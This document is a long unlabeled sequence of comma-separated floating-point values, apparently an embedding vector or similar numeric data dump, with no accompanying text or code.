0.019507765769958496, -0.03845201060175896, 0.006111714988946915, -0.012695793062448502, -0.016607291996479034, 0.035336073487997055, 0.02114860713481903, 0.016234373673796654, 0.028822435066103935, 0.011187545955181122, -0.008079894818365574, 0.021728701889514923, 0.11137823760509491, -0.01386427041143179, -0.029684290289878845, -0.016822755336761475, -0.014146030880510807, -0.0020769473630934954, 0.007607531733810902, -0.01728683151304722, 0.055954307317733765, -0.03175605833530426, -0.018165260553359985, -0.015090757049620152, 0.027629096060991287, 0.0013093572342768312, -0.016350392252206802, -0.011693057604134083, 0.04322536289691925, -0.008834018371999264, 0.0008100612321868539, 0.0087428605183959, 0.02960141934454441, 0.0077484119683504105, -0.015621129423379898, -0.024181675165891647, 0.0027761689852923155, 0.007901722565293312, 0.014983025379478931, -0.003505431115627289, 0.049821872264146805, 0.002169140847399831, 0.0133504718542099, -0.052672624588012695, -0.022789446637034416, 0.016657013446092606, -0.021927591413259506, -0.01593603752553463, 0.014941589906811714, 0.003420488676056266, 0.03460681065917015, 0.001362187322229147, -0.02411537803709507, -0.03944645822048187, -0.02507667802274227, 0.013474778272211552, 0.032750505954027176, 0.0005264880019240081, -0.015563120134174824, 0.0030102788005024195, 0.010209672152996063, -0.007106163538992405, 0.04229721426963806, 0.00015512362006120384, -0.012273152358829975, -0.018811652436852455, -0.030827905982732773, 0.01899396814405918, 0.014709551818668842, -0.006998431868851185, 0.014568671584129333, -0.08545628190040588, 0.03417588397860527, 0.01959063671529293, 0.04213147237896919, 0.004458444193005562, 0.004715343471616507, -0.035932742059230804, -0.013226166367530823, 0.004918376915156841, -0.0017910433234646916, 0.018877949565649033, 0.018264705315232277, 0.0024778342340141535, -0.022027036175131798, 0.00977045763283968, 0.0052084242925047874, 0.061125438660383224, -0.014179179444909096, 0.002233365783467889, 0.01550511084496975, -0.014792422764003277, -0.031093092635273933, 0.019308876246213913, -0.018877949565649033, 0.0065136379562318325, 0.01533936895430088, -0.03371180593967438, 0.009182075038552284, -0.052772071212530136, 0.01259634830057621, -0.020121010020375252, 0.008005310781300068, 0.02615399658679962, -0.04975557699799538, -0.04339110478758812, -0.013275888748466969, -0.052341144531965256, 0.030562719330191612, -0.01683932915329933, 0.035866446793079376, 0.0021080237347632647, -0.04176684096455574, -0.006012270227074623, -0.016010621562600136, 0.016284095123410225, -0.02583908848464489, 0.0028859726153314114, 0.03944645822048187, -0.019474618136882782, 0.03246874734759331, -0.03908183053135872, -0.0567498654127121, -0.02303805761039257, 0.017850352451205254, -0.006335466168820858, -0.0340101420879364, -0.035336073487997055, -0.0007743232417851686, -0.048694830387830734, -0.007930727675557137, -0.018612762913107872, -0.02099943906068802, -0.0030309963040053844, -0.006542643066495657, 0.0225076861679554, -0.000609099748544395, -0.0004039947234559804, -0.003745756344869733, 0.016441550105810165, -0.015969187021255493, -0.00296677160076797, 0.024314267560839653, 0.00888374075293541, 0.03841886296868324, -0.01997184194624424, -0.03338032215833664, 0.027198167517781258, -0.0071103074587881565, 0.04779982939362526, 0.03659570589661598, -0.009563280269503593, 0.016540994867682457, 0.027761688455939293, -0.004388004541397095, -0.01603548228740692, -0.019027115777134895, -0.049921318888664246, 0.02885558269917965, 0.0354355163872242, 0.0037312537897378206, 0.018331002444028854, -0.0007893435540609062, 0.00030092429369688034, 0.005527476780116558, -0.020004989579319954, 0.05376651883125305, -0.030181514099240303, -0.016673587262630463, 0.01894424483180046, 0.012654357589781284, 0.007474938407540321, -0.044484999030828476, 0.030595866963267326, -0.0032133120112121105, -0.021347496658563614, 0.007085446268320084, -0.006691810209304094, -0.026734093204140663, -0.0066420878283679485, 0.0014626680640503764, 0.024513157084584236, -0.012430607341229916, -0.000305585766909644, -0.0014139815466478467, 0.012414032593369484, 0.008759434334933758, 0.0255076065659523, 0.009538419544696808, -0.020767400041222572, -0.03369523212313652, -0.04703741893172264, 0.03165661171078682, -0.02303805761039257, 0.029319658875465393, -0.01132842618972063, 0.04083868861198425, 0.02330324426293373, 0.009447261691093445, 0.0014605963369831443, 0.035833295434713364, -0.0008385480614379048, 0.007955588400363922, 0.02121490240097046, -0.0294522512704134, -0.00081109709572047, 0.013665380887687206, -0.022325370460748672, 0.015165341086685658, 0.030811332166194916, 0.0037975504528731108, 0.00957985408604145, 0.05409800261259079, 0.04713686183094978, -0.03613163158297539, -0.034043289721012115, -0.03709293156862259, -0.011179259046912193, 0.06689324229955673, 0.018927671015262604, 0.017800629138946533, -0.02981688268482685, -0.01138643641024828, 0.02734733559191227, 0.007752555422484875, -0.0478992722928524, 0.008378229103982449, -0.016267521306872368, -0.005535763688385487, 0.005071687512099743, 0.000640176294837147, -0.01932545006275177, -0.013391907326877117, -0.025258993729948997, -0.019043689593672752, 0.00005590536238742061, -0.015430526807904243, -0.006724958308041096, -0.0435899943113327, -0.03768960013985634, -0.04667278751730919, 0.009588141925632954, -0.010773193091154099, -0.034374773502349854, -0.047402046620845795, 0.01631724275648594, -0.014444365166127682, 0.0017837921623140574, -0.0457446351647377, -0.01410459540784359, 0.03656255826354027, 0.034109584987163544, 0.016648726537823677, 0.001593189430423081, 0.03251846879720688, -0.005684930831193924, -0.03230300545692444, 0.005568911787122488, -0.0027782407123595476, -0.02444685995578766, 0.030479848384857178, -0.019822673872113228, 0.0469379723072052, 0.011593612842261791, -0.04325851425528526, -0.047402046620845795, 0.017618313431739807, -0.01944146864116192, -0.036628857254981995, -0.019772952422499657, -0.019739804789423943, -0.032816801220178604, -0.0057305097579956055, -0.010416848585009575, 0.036628857254981995, -0.024148525670170784, -0.0177177581936121, -0.04528055712580681, -0.025126401335000992, 0.006016413681209087, -0.016698447987437248, -0.009380964562296867, 0.025225846096873283, -0.02529214136302471, -0.02272314950823784, 0.030612442642450333, 0.032816801220178604, 0.014958163723349571, 0.00040503061609342694, -0.012447181157767773, 0.0071641732938587666, -0.03019808791577816, -0.0021649973932653666, -0.018496742472052574, -0.03202124312520027, -0.014842145144939423, -0.05058428272604942, 0.004756778944283724, -0.012372598052024841, -0.011162685230374336, -0.0428607314825058, 0.007769129239022732, -0.017784055322408676, 0.0033500485587865114, 0.0030890058260411024, 0.05167817696928978, 0.011651622131466866, -0.012281440198421478, 0.004147679079324007, -0.027330761775374413, 0.02837493270635605, 0.025441309437155724, 0.0177177581936121, -0.006878269370645285, -0.0045703197829425335, -0.05257318168878555, 0.017784055322408676, 0.012936118058860302, -0.003749899799004197, 0.026137422770261765, -0.008535683155059814, -0.033181432634592056, 0.006691810209304094, 0.008171052671968937, 0.008560544811189175, 0.019292302429676056, 0.020121010020375252, 0.01162676140666008, -0.030048921704292297, -0.03127540647983551, 0.027413632720708847, -0.018281279131770134, -0.023435838520526886, 0.03225328028202057, 0.02529214136302471, 0.04488277807831764, 0.016499558463692665, -0.011477594263851643, -0.03914812579751015, -0.03649626299738884, -0.015422239899635315, -0.02249111235141754, -0.039910536259412766, -0.0332808792591095, 0.023054633289575577, -0.012447181157767773, 0.02007128670811653, -0.00949698407202959, -0.013085286132991314, -0.03096049837768078, -0.009438974782824516, 0.04484963044524193, -0.012745515443384647, 0.014286911115050316, 0.03908183053135872, -0.05605375021696091, -0.019126560539007187, -0.006782968062907457, 0.011958244256675243, 0.05857302248477936, -0.006372757721692324, 0.020585086196660995, -0.02174527570605278, -0.0191597081720829, 0.01841387338936329, 0.014179179444909096, 0.014974738471210003, -0.006977714132517576, -0.022242499515414238, 0.010110227391123772, -0.035501815378665924, 0.01146930642426014, 0.005556481424719095, 0.002025153022259474, -0.020386194810271263, 0.029369380325078964, 0.01485871896147728, 0.00036463115247897804, 0.011668196879327297, -0.002440542448312044, -0.00812961719930172, 0.004174611996859312, 0.030380403622984886, 0.01910998672246933, 0.00020406913245096803, -0.005829954519867897, -0.021165180951356888, -0.022623704746365547, 0.009182075038552284, -0.025441309437155724, 0.014460939913988113, 0.003136656479910016, 0.02545788325369358, 0.018529891967773438, 0.010615738108754158, 0.017469147220253944, -0.02804344892501831, 0.015952613204717636, -0.03165661171078682, 0.0068906997330486774, -0.004247124306857586, 0.005013678222894669, -0.018165260553359985, 0.00888374075293541, -0.01899396814405918, 0.012206856161355972, 0.00186044757720083, 0.04203202575445175, -0.018016092479228973, 0.0036773879546672106, 0.016971921548247337, 0.00754952197894454, 0.012712367810308933, -0.04958983510732651, -0.03467310592532158, -0.036628857254981995, 0.005548194516450167, 0.021678978577256203, 0.004247124306857586, 0.004209832288324833, 0.03374495357275009, 0.03715922683477402, 0.016458123922348022, 0.00016496451280545443, -0.03276707977056503, 0.016988497227430344, 0.033347174525260925, 0.0016978137427940965, 0.013383620418608189, 0.008390659466385841, -0.01374825183302164, -0.017319979146122932, -0.02658492513000965, -0.03715922683477402, 0.0161017794162035, -0.016350392252206802, 0.026734093204140663, -0.010300830006599426, -0.001949533587321639, 0.033347174525260925, 0.002875613747164607, -0.012778664007782936, -0.01760173961520195, -0.02686668559908867, 0.0510152131319046, -0.04919205605983734, 0.0262202937155962, 0.006157293915748596, 0.029916327446699142, 0.00384105765260756, -0.0014616322005167603, -0.0034639958757907152, 0.014494087547063828, 0.005013678222894669, 0.02449658326804638, 0.007657254114747047, 0.03596588969230652, -0.029617993161082268, -0.02088342048227787, 0.016060344874858856, 0.009372677654027939, -0.017784055322408676, -0.020750826224684715, -0.021562959998846054, 0.026767240837216377, -0.014204040169715881, -0.01289468351751566, -0.026137422770261765, -0.006020557601004839, 0.03669515252113342, 0.007479081861674786, -0.038684047758579254, 0.004769209772348404, 0.028971601277589798, 0.01743599772453308, 0.010027356445789337, 0.015853168442845345, 0.007437646389007568, 0.027595948427915573, 0.009629577398300171, -0.016383539885282516, -0.014891867525875568, -0.0010856064036488533, 0.008983185514807701, -0.020369620993733406, -0.028706414625048637, 0.014684690162539482, 0.008233205415308475, -0.0019940766505897045, 0.005966691300272942, -0.019822673872113228, -0.004187042824923992, -0.0267009437084198, 0.004259554669260979, 0.013267600908875465, 0.011345000937581062, -0.026618072763085365, 0.039214421063661575, -0.0048147886991500854, 0.0005011088214814663, 0.02121490240097046, 0.010972082614898682, -0.019574062898755074, 0.004914233461022377, -0.011502454988658428, 0.01412945706397295, -0.022375091910362244, -0.021513236686587334, 0.005357591435313225, 0.001802438055165112, 0.0064970641396939754, 0.004856223706156015, -0.0029439821373671293, -0.0056144907139241695, 0.010416848585009575, 0.04010942578315735, -0.018115537241101265, 0.028822435066103935, -0.005589629523456097, -0.01324274018406868, 0.02363472804427147, -0.002361815422773361, 0.028457803651690483, 0.007006718777120113, -0.00788100529462099, 0.02373417280614376, -0.006712527945637703, 0.012662645429372787, 0.03629737347364426, -0.005871389992535114, -0.00016133891767822206, -0.014734412543475628, 0.025275567546486855, -0.04090498387813568, -0.00977045763283968, -0.016872476786375046, -0.02723131701350212, 0.015704000368714333, 0.015969187021255493, 0.02950197458267212, -0.0002133920934284106, -0.02782798558473587, -0.01509904395788908, -0.0004065844404976815, -0.005672500468790531, 0.009240084327757359, 0.06331322342157364, -0.026783814653754234, 0.016599003225564957, -0.019126560539007187, 0.02481149137020111, 0.03623107448220253, 0.007516373880207539, -0.03848515823483467, 0.009530131705105305, -0.002270657569169998, 0.02008786052465439, 0.015024460852146149, -0.020319899544119835, 0.01046657096594572, 0.0062898872420191765, -0.006898987106978893, 0.020386194810271263, 0.015811732038855553, 0.0030703600496053696, 0.0012699937215074897, -0.022855743765830994, 0.03603218495845795, -0.02164583094418049, 0.0161017794162035, 0.005104836076498032, -0.008983185514807701, 0.026949556544423103, 0.005287151783704758, -0.04213147237896919, -0.013325611129403114, -0.00002783937998174224, -0.023701023310422897, -0.018214983865618706, 0.017999518662691116, -0.008200056850910187, 0.007636536378413439, 0.03546866402029991, -0.047832977026700974, -0.018231557682156563, -0.00644734175875783, -0.007238756865262985, 0.01662386581301689, 0.006787111517041922, -0.016110066324472427, -0.014552097767591476, -0.010731757618486881, -0.007392067462205887, -0.0039695072919130325, 0.015969187021255493, -0.0021919303108006716, 0.03122568503022194, 0.013018989004194736, -0.0030351399909704924, -0.009041194804012775, 0.0010617810767143965, -0.004711200017482042, -0.029187064617872238, -0.020817123353481293, -0.0014440221711993217, 0.007425216026604176, -0.007905866019427776, -0.012844961136579514, 0.0037644021213054657, 0.004504023119807243, -0.013715103268623352, 0.012546625919640064, 0.035170331597328186, 0.012654357589781284, 0.02293861284852028, 0.003571727778762579, 0.04498222470283508, 0.0017962227575480938, 0.023054633289575577, 0.0068492647260427475, 0.045943524688482285, -0.00985332764685154, -0.00936439074575901, -0.022308796644210815, 0.021596107631921768, 0.009911336936056614, -0.048197608441114426, -0.01098036952316761, 0.03284995257854462, 0.020966291427612305, 0.037755899131298065, -0.003971579018980265, 0.010955508798360825, 0.012637783773243427, -0.029352806508541107, 0.031093092635273933, 0.03386097401380539, -0.042496103793382645, 0.009679299779236317, 0.015181914903223515, 0.0008167944615706801, 0.032750505954027176, -0.007044010795652866, 0.03901553153991699, 0.004719487391412258, -0.016889050602912903, -0.019076839089393616, 0.018778502941131592, -0.005307869054377079, 0.0014170892536640167, -0.007557809352874756, -0.01942489482462406, -0.021281199529767036, 0.01576201058924198, 0.026899833232164383, 0.007628249004483223, 0.002419824944809079, 0.011742779985070229, 0.0271815937012434, 0.026518628001213074, -0.0061365761794149876, 0.009704160504043102, 0.005784376058727503, -0.0019630000460892916, 0.031673185527324677, -0.03875034675002098, 0.018165260553359985, 0.009347816929221153, -0.05499300733208656, 0.020154157653450966, -0.0007898614858277142, 0.0015797229716554284, -0.0036504550371319056, 0.0008079894469119608, -0.009488697163760662, 0.011858799494802952, -0.011900234967470169, -0.001222343067638576, -0.020800549536943436, -0.01348306518048048, -0.019192857667803764, -0.021596107631921768, 0.0007370313978753984, -0.0684843584895134, 0.02857382223010063, -0.009803605265915394, 0.025225846096873283, 0.025855662301182747, 0.0066420878283679485, 0.008444525301456451, -0.03768960013985634, 0.01461839396506548, 0.032004669308662415, 0.016110066324472427, -0.030512996017932892, 0.03672830015420914, -0.015803445130586624, 0.010615738108754158, -0.009936198592185974, -0.023916488513350487, 0.002523413160815835, 0.028938453644514084, -0.029932901263237, -0.013027275912463665, -0.0028300348203629255, 0.003604876110330224, 0.0005055113579146564, -0.020535362884402275, -0.028789285570383072, -0.0024612601846456528, -0.01841387338936329, -0.03440792113542557, 0.04806501418352127, 0.03155716881155968, 0.03397699445486069, -0.05018650367856026, 0.014494087547063828, 0.021944165229797363, -0.0028528242837637663, -0.002728518331423402, 0.0019951125141233206, -0.008784295991063118, 0.019524339586496353, -0.017933223396539688, 0.01910998672246933, 0.002175356261432171, -0.04325851425528526, -0.015148766338825226, -0.019623784348368645, 0.009430686943233013, -0.005324443336576223, 0.015737148001790047, 0.022027036175131798, -0.0012689578579738736, -0.008676563389599323, -0.026386035606265068, 0.014485800638794899, -0.02492750994861126, 0.050418540835380554, 0.005009534768760204, -0.009140639565885067, -0.019607210531830788, 0.03629737347364426, -0.004520597402006388, -0.02282259427011013, 0.004187042824923992, -0.011635048314929008, 0.011891947127878666, -0.0017050649039447308, 0.009654438123106956, -0.037059783935546875, -0.009422400034964085, 0.0059501174837350845, 0.0122151430696249, 0.024910936132073402, 0.019739804789423943, 0.02423139661550522, -0.0035883018281310797, 0.017916647717356682, 0.01098036952316761, 0.0361647792160511, 0.02164583094418049, -0.014030012302100658, -0.0033334745094180107, -0.0016107994597405195, -0.000609617680311203, -0.015637703239917755, -0.0010866422671824694, 0.009414113126695156, -0.009671011939644814, -0.031026795506477356, 0.013168156147003174, -0.013367046602070332, -0.003907354082912207, -0.043357957154512405, -0.008734573610126972, 0.030380403622984886, -0.013955428265035152, -0.007338201627135277, 0.0006515709683299065, -0.00861026719212532, -0.036794595420360565, -0.012927831150591373, -0.0056890747509896755, 0.044650740921497345, -0.042396657168865204, 0.012024540454149246, -0.020170731469988823, -0.014900154434144497, 0.02335296757519245, -0.00372089515440166, 0.010217959061264992, -0.007259474601596594, -0.010309116914868355, 0.02423139661550522, -0.0024488295894116163, -0.00912406574934721, 0.014925015158951283, 0.01824813149869442, 0.02313750423491001, 0.011850511655211449, -0.016756458207964897, -0.021330920979380608, 0.005171132739633322, 0.0013010702095925808, -0.021032586693763733, -0.019126560539007187, 0.012588061392307281, -0.02169555239379406, 0.024347415193915367, -0.00343084754422307, 0.01533936895430088, -0.0019060263875871897, -0.002007543109357357, 0.013698529452085495, -0.005312012974172831, -0.0006842013099230826, 0.001188158872537315, -0.02761252224445343, -0.0015641847858205438, 0.020369620993733406, 0.03633052110671997, 0.03546866402029991, -0.001655342523008585, 0.012695793062448502, 0.03669515252113342, 0.021977312862873077, -0.008067464455962181, 0.008867166005074978, -0.04302647337317467, 0.0059003946371376514, 0.0004563068796414882, -0.009041194804012775, -0.013433342799544334, 0.0046614776365458965, -0.01509904395788908, 0.027247890830039978, 0.0038742059841752052, -0.019308876246213913, -0.00015590053226333112, 0.007474938407540321, -0.008709711953997612, -0.014842145144939423, -0.0026311450637876987, 0.02535843849182129, 0.028822435066103935, -0.0170050710439682, -0.01283667329698801, 0.002204360906034708, 0.03778904676437378, -0.015065895393490791, 0.0045703197829425335, -0.025225846096873283, -0.0009043266763910651, 0.010889211669564247, 0.02212648093700409, -0.00026881188387051225, -0.005635208450257778, 0.0165824294090271, -0.02018730528652668, -0.02406565472483635, -0.029916327446699142, -0.006397618912160397, -0.020800549536943436, 0.01022624596953392, -0.021115457639098167, -0.01813211292028427, 0.009107491932809353, 0.019342023879289627, -0.015041034668684006, 0.006178011652082205, -0.02691640704870224, -0.02336954139173031, 0.006932135205715895, 0.013143295422196388, -0.013309036381542683, 0.02572306990623474, 0.010549441911280155, -0.01361565850675106, -0.03187207505106926, -0.022308796644210815, -0.04226406291127205, 0.00960471574217081, -0.00020057302026543766, -0.009032907895743847, 0.030330682173371315, -0.02588881179690361, -0.00818348303437233, -0.005237428937107325, 0.027380483224987984, 0.01712108962237835, -0.022806020453572273, 0.019789526239037514, 0.01572057418525219, -0.007972163148224354, 0.022756299003958702, -0.013358758762478828, 0.003799622179940343, 0.010673748329281807, 0.021761849522590637, -0.005407314281910658, -0.022209351882338524, 0.006178011652082205, -0.0383194163441658, -0.019408321008086205, -0.0037353974767029285, 0.029485400766134262, -0.024828065186738968, 0.030330682173371315, 0.0020707319490611553, 0.03137485310435295, -0.024297693744301796, 0.0035551537293940783, -0.0069818575866520405, -0.00899147242307663, -0.010441710241138935, -0.000494116626214236, -0.006700097117573023, -0.017021644860506058, 0.018480168655514717, -0.012786950916051865, -0.012281440198421478, -0.004180827643722296, -0.008001167327165604, -0.013184730894863605, 0.023800469934940338, -0.006248451769351959, 0.008817443624138832, 0.021413791924715042, 0.004367286805063486, 0.01997184194624424, 0.011991391889750957, 0.0017641102895140648, -0.018596189096570015, -0.005312012974172831, 0.00985332764685154, -0.04150165244936943, 0.014784134924411774, -0.008100612089037895, 0.005610347259789705, -0.03338032215833664, -0.0017941509140655398, 0.06646231561899185, 0.027214743196964264, -0.003565512364730239, 0.008415521122515202, 0.0014885652344673872, -0.02272314950823784, 0.005104836076498032, -0.004083454608917236, 0.01499131228774786, 0.00250269565731287, 0.000523121387232095, 0.02923678793013096, 0.00674153259024024, 0.02126462571322918, -0.010085365734994411, 0.006492920219898224, -0.0015817946987226605, -0.004325851332396269, -0.015190201811492443, 0.013773112557828426, 0.005063400603830814, -0.01813211292028427, -0.01022624596953392, 0.007777416612952948, -0.026551777496933937, -0.011659909039735794, -0.0048313625156879425, -0.0007862359052523971, -0.002177427988499403, 0.007885148748755455, 0.010938934050500393, 0.019772952422499657, 0.025988256558775902, -0.0004910089774057269, -0.017054792493581772, 0.008055033162236214, 0.004153894726186991, -0.002440542448312044, -0.01548024918884039, 0.004545458592474461, -0.04269499331712723, -0.0040337322279810905, 0.014867005869746208, -0.004769209772348404, 0.013632232323288918, -0.04140220955014229, -0.0018262633820995688, -0.009082630276679993, -0.009223510511219501, -0.019607210531830788, 0.024363989010453224, -0.008212488144636154, 0.0028548960108309984, -0.013955428265035152, 0.012704080902040005, -0.007781560067087412, 0.004015086218714714, 0.0030102788005024195, 0.08174367249011993, 0.013209591619670391, 0.008079894818365574, -0.02751307748258114, -0.018861373886466026, 0.02282259427011013, 0.00899147242307663, 0.0001843873324105516, 0.013963715173304081, -0.014767561107873917, 0.015463675372302532, 0.006505351047962904, -0.015438813716173172, 0.004164253361523151, -0.008966611698269844, 0.013143295422196388, 0.013383620418608189, -0.004234693478792906, -0.008867166005074978, 0.019126560539007187, -0.01722053438425064, 0.003963292110711336, 0.00961300265043974, 0.003217455465346575, -0.0152067756280303, 0.02179499715566635, -0.016275808215141296, -0.024894362315535545, -0.028408080339431763, -0.014974738471210003, -0.0011767641408368945, 0.0077649857848882675, 0.016715023666620255, 0.0033169002272188663, 0.014925015158951283, 0.023783894255757332, -0.03165661171078682, -0.007392067462205887, -0.009778744541108608, -0.021347496658563614, 0.028988175094127655, -0.008519109338521957, -0.0017827561823651195, 0.008195913396775723, -0.009397539310157299, -0.010135088115930557, 0.015488536097109318, 0.008659989573061466, -0.021082310006022453, 0.009969347156584263, -0.050783172249794006, -0.008419664576649666, -0.013657093979418278, 0.005345161072909832, -0.005631064996123314, 0.010259394533932209, 0.023833617568016052, 0.0036255938466638327, 0.02772854082286358, 0.010126801207661629, -0.0009473158279433846, 0.0006494992412626743, 0.004545458592474461, -0.03487199544906616, 0.00985332764685154, 0.00998592097312212, -0.016864189878106117, 0.0048313625156879425, -0.00674153259024024, -0.0076323929242789745, 0.0054446058347821236, 0.014170892536640167, -0.0003454672987572849, -0.00296055618673563, -0.0047402046620845795, 0.012936118058860302, 0.012181994505226612, 0.0015900818398222327, -0.0010234533110633492, -0.028292061761021614, 0.016433263197541237, 0.03450736403465271, 0.0013601155951619148, -0.008966611698269844, -0.004620042163878679, 0.013690241612493992, -0.015952613204717636, 0.016864189878106117, 0.021894441917538643, 0.0282589141279459, 0.0022727292962372303, -0.0085025355219841, 0.012455468066036701, -0.018960818648338318, -0.013193017803132534, 0.02960141934454441, 0.002089377958327532, 0.013027275912463665, -0.01760173961520195, -0.014601820148527622, -0.004773353226482868, -0.0003014422254636884, 0.039811089634895325, -0.011941669508814812, -0.015074183233082294, 0.0066047958098351955, -0.002262370428070426, 0.0011798718478530645, -0.026253441348671913, -0.007897579111158848, 0.0034971442073583603, -0.005846528802067041, -0.019176283851265907, -0.00008002203685464337, -0.007793990429490805, -0.014394642785191536, 0.027910856530070305, 0.001013612374663353, 0.020634807646274567, 0.014063159935176373, -0.03599903732538223, -0.003281680168583989, 0.0057678017765283585, -0.0027533795218914747, 0.012770377099514008, 0.014875292778015137, -0.001042617135681212, -0.014867005869746208, 0.013524500653147697, 0.030512996017932892, 0.0005899359239265323, 0.008415521122515202, 0.0035841583739966154, 0.016590716317296028, 0.013184730894863605, -0.02293861284852028, -0.01445265207439661, 0.025491030886769295, 0.02313750423491001, 0.012770377099514008, -0.020899994298815727, 0.01577029749751091, 0.017419423907995224, -0.0026850111316889524, -0.00025055441074073315, -0.009298094548285007, -0.030280958861112595, -0.004288559313863516, -0.005705648567527533, -0.011485881172120571, -0.009836753830313683, -0.05021965131163597, 0.015902889892458916, 0.02114860713481903, -0.0045164539478719234, 0.01175935473293066, 0.00019150903972331434, -0.028540674597024918, 0.000580612919293344, 0.0035862301010638475, 0.023982783779501915, 0.03223670646548271, 0.014419504441320896, -0.00864341575652361, -0.0018221198115497828, -0.0003110241377726197, 0.0051296972669661045, -0.009695873595774174, -0.006294030696153641, -0.01598576083779335, 0.007727694232016802, 0.010814628563821316, -0.01846359483897686, -0.012041115202009678, 0.024264544248580933, -0.013963715173304081, 0.011212407611310482, 0.002007543109357357, 0.04431925714015961, -0.027330761775374413, 0.021065736189484596, -0.01283667329698801, -0.025872236117720604, -0.0202370285987854, 0.03821997344493866, 0.010590877383947372, -0.013731677085161209, 0.018778502941131592, -0.009927911683917046, 0.0471700094640255, -0.008411377668380737, 0.008668276481330395, -0.03364551067352295, -0.0019029187969863415, -0.013690241612493992, -0.04488277807831764, -0.01851331815123558, -0.007777416612952948, -0.0010265610180795193, -0.022093331441283226, -0.005158701911568642, -0.020585086196660995, -0.01872878149151802, -0.00925665907561779, 0.0045537459664046764, -0.03649626299738884, -0.012041115202009678, -0.002873542020097375, 0.012737228535115719, -0.007661397568881512, -0.003907354082912207, -0.03202124312520027, -0.015687426552176476, -0.022043609991669655, 0.017634887248277664, -0.0018925599288195372, 0.012505190446972847, -0.06132432818412781, 0.004524740856140852, -0.00798873696476221, -0.01834757626056671, 0.0033749097492545843, -0.023054633289575577, 0.011461019515991211, 0.03699348494410515, 0.008568831719458103, 0.027032427489757538, -0.01786692626774311, -0.001396371517330408, -0.00018244505918119103, 0.003909425809979439, 0.019955268129706383, 0.024562880396842957, -0.0025669203605502844, -0.014842145144939423, -0.020170731469988823, -0.009927911683917046, -0.0003576389281079173, 0.005212567746639252, 0.010673748329281807, 0.015380804426968098, 0.022109907120466232, -0.021546386182308197, -0.0050758314318954945, -0.0028901160694658756, -0.00008196431735996157, 0.026618072763085365, -0.0021318490616977215, -0.0026104275602847338, 0.010897498577833176, -0.019888971000909805, -0.00950527098029852, -0.008013597689568996, -0.01862933672964573, -0.006828546989709139, -0.012778664007782936, 0.004810644779354334, 0.008473530411720276, -0.01557969395071268, -0.019938694313168526, 0.01620122417807579, -0.0025710638146847486, -0.008079894818365574, -0.011278703808784485, -0.01728683151304722, 0.025540754199028015, -0.0029978479724377394, 0.0013456132728606462, 0.0027140157762914896, 0.0010524580720812082, -0.01717081107199192, 0.010267681442201138, 0.002322451677173376, -0.028921879827976227, -0.022259073331952095, -0.0017661821329966187, 0.02093314193189144, -0.024480009451508522, -0.027430206537246704, 0.00018788344459608197, 0.000026091325707966462, 0.021181754767894745, -0.0017123161815106869, 0.004019229672849178, -0.006654518190771341, -0.025772791355848312, -0.025209270417690277, -0.010110227391123772, -0.010441710241138935, -0.013400194235146046, -0.004636616446077824, -0.02045249193906784, -0.01932545006275177, -0.020916568115353584, 0.00675396341830492, 0.006592365447431803, -0.008892027661204338, -0.005104836076498032, -0.012190282344818115, 0.00019215646898373961, 0.004943238105624914, 0.002614571014419198, 0.033943843096494675, 0.005585486069321632, -0.026087701320648193, 0.0012254506582394242, -0.001828335109166801, -0.015065895393490791, -0.0067208148539066315, -0.011030091904103756, -0.00418497109785676, -0.03875034675002098, -0.008958323858678341, 0.003221598919481039, -0.006260882597416639, 0.009049481712281704, -0.01625094749033451, 0.014949876815080643, -0.0056890747509896755, 0.01300241518765688, -0.016657013446092606, 0.020585086196660995, -0.02955169603228569, -0.017949797213077545, -0.019126560539007187, 0.002002363558858633, 0.0030351399909704924, -0.013300749473273754, -0.011195833794772625, -0.015844879671931267, 0.004914233461022377, -0.022839168086647987, -0.01485871896147728, 0.01798294484615326, 0.009795318357646465, -0.012820099480450153, 0.00643491093069315, -0.0005448749288916588, -0.020336473360657692, 0.02320379950106144, -0.02385019138455391, 0.012372598052024841, 0.01138643641024828, 0.0003226778353564441, 0.009190361946821213, 0.002529628574848175, 0.01160189975053072, -0.007081302348524332, -0.015629416331648827, -0.02088342048227787, -0.0025379157159477472, 0.01224829163402319, -0.014121169224381447, 0.00847767386585474, 0.001076283399015665, -0.009066056460142136, -0.02061823382973671, 0.022325370460748672, 0.001045206910930574, -0.008950036950409412, -0.03198809549212456, 0.009182075038552284, -0.01901054196059704, -0.03536922112107277, -0.0071641732938587666, 0.012165420688688755, -0.015190201811492443, 0.005805093329399824, 0.010972082614898682, 0.016234373673796654, -0.0059501174837350845, -0.0057678017765283585, 0.02056851051747799, -0.004412865731865168, -0.004108315799385309, -0.035667553544044495, -0.030993647873401642, -0.022192778065800667, -0.004843793343752623, 0.012695793062448502, -0.02923678793013096, -0.016076918691396713, -0.006061992608010769, 0.0078022778034210205, -0.013010702095925808, -0.007984593510627747, 0.002939838683232665, -0.020717678591609, -0.02643575705587864, 0.007267761509865522, -0.016930487006902695, -0.00605370569974184, 0.020866846665740013, 0.014568671584129333, 0.0035572254564613104, 0.009936198592185974, 0.007114450912922621, 0.01872878149151802, -0.007222182583063841, -0.0018355862703174353, 0.00400887057185173, -0.02627001702785492, -0.011502454988658428, 0.009422400034964085, 0.02088342048227787, 0.022905465215444565, 0.006886556278914213, -0.029916327446699142, 0.02121490240097046, -0.007628249004483223, 0.026932982727885246, -0.010300830006599426, -0.010831202380359173, -0.012065975926816463, 0.0036856750957667828, 0.015538258478045464, 0.006306461524218321, -0.003107651835307479, 0.017419423907995224, 0.01910998672246933, 0.0031159387435764074, -0.0033541922457516193, -0.00936439074575901, 0.004533028230071068, -0.013035563752055168, -0.00730919698253274, -0.0009535311255604029, -0.0028590396977961063, -0.012927831150591373, -0.014891867525875568, 0.022143054753541946, 0.024612601846456528, -0.012778664007782936, 0.005871389992535114, -0.004599324427545071, -0.013325611129403114, -0.023336393758654594, -0.0018366222502663732, 0.009737309068441391, -0.009347816929221153, 0.005158701911568642, -0.0035613689105957747, -0.024098804220557213, -0.0050385394133627415, -0.02308778092265129, -0.005784376058727503, 0.001013094442896545, 0.0026767239905893803, -0.0015175699954852462, -0.014402929693460464, 0.02529214136302471, -0.005494328215718269, -0.0010488324332982302, -0.004162181634455919, -0.010599164292216301, 0.004731917753815651, 0.016458123922348022, -0.003163589397445321, -0.002935694996267557, 0.0057305097579956055, 0.013789686374366283, -0.0041021001525223255, 0.000480132206575945, -0.008842305280268192, 0.008809156715869904, 0.013648806139826775, 0.014286911115050316, -0.022358518093824387, -0.00481893215328455, -0.0022830881644040346, 0.0471700094640255, 0.009206936694681644, -0.009314668364822865, -0.018165260553359985, 0.037324968725442886, -0.01445265207439661, -0.003057929454371333, -0.0006515709683299065, -0.00023669947404414415, 